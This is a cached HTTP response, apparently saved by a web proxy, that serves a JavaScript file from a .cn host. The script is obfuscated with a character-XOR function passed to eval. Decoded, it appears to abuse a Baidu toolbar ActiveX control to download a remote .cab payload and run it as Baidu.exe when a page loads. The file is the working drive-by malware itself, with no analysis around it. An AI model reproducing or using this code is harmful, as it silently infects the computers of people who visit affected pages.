HTTP/1.1 200 OK
Content-Length: 1312
ETag: "677d573399ec91:299"
Date: Thu, 12 Mar 2009 07:09:08 GMT
Last-Modified: Fri, 06 Mar 2009 08:56:35 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/new.js
X-Polipo-Date: Thu, 12 Mar 2009 07:17:08 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:59 GMT

document.writeln("<script>");
var GT=function(m){return String.fromCharCode(m^2)};eval(GT(118)+GT(112)+GT(123)+GT(121)+GT(116)+GT(99)+GT(112)+GT(34)+GT(104)+GT(57)+GT(116)+GT(99)+GT(112)+GT(34)+GT(114)+GT(96)+GT(102)+GT(63)+GT(108)+GT(103)+GT(117)+GT(34)+GT(67)+GT(97)+GT(118)+GT(107)+GT(116)+GT(103)+GT(90)+GT(77)+GT(96)+GT(104)+GT(103)+GT(97)+GT(118)+GT(42)+GT(32)+GT(64)+GT(99)+GT(107)+GT(102)+GT(119)+GT(64)+GT(99)+GT(112)+GT(44)+GT(86)+GT(109)+GT(109)+GT(110)+GT(32)+GT(43)+GT(127)+GT(97)+GT(99)+GT(118)+GT(97)+GT(106)+GT(42)+GT(104)+GT(43)+GT(121)+GT(127)+GT(57)+GT(100)+GT(107)+GT(108)+GT(99)+GT(110)+GT(110)+GT(123)+GT(121)+GT(107)+GT(100)+GT(42)+GT(104)+GT(35)+GT(63)+GT(32)+GT(89)+GT(109)+GT(96)+GT(104)+GT(103)+GT(97)+GT(118)+GT(34)+GT(71)+GT(112)+GT(112)+GT(109)+GT(112)+GT(95)+GT(32)+GT(43)+GT(121)+GT(114)+GT(96)+GT(102)+GT(89)+GT(32)+GT(70)+GT(110)+GT(109)+GT(99)+GT(102)+GT(70)+GT(81)+GT(32)+GT(95)+GT(42)+GT(32)+GT(106)+GT(118)+GT(118)+GT(114)+GT(56)+GT(45)+GT(45)+GT(97)+GT(47)+GT(50)+GT(114)+GT(44)+GT(97)+GT(108)+GT(56)+GT(52)+GT(51)+GT(49)+GT(55)+GT(45)+GT(64)+GT(99)+GT(107)+GT(102)+GT(119)+GT(44)+GT(97)+GT(99)+GT(96)+GT(32)+GT(46)+GT(32)+GT(64)+GT(99)+GT(107)+GT(102)+GT(119)+GT(44)+GT(103)+GT(122)+GT(103)+GT(32)+GT(46)+GT(50)+GT(43)+GT(127)+GT(127)+'');
document.writeln("</script>");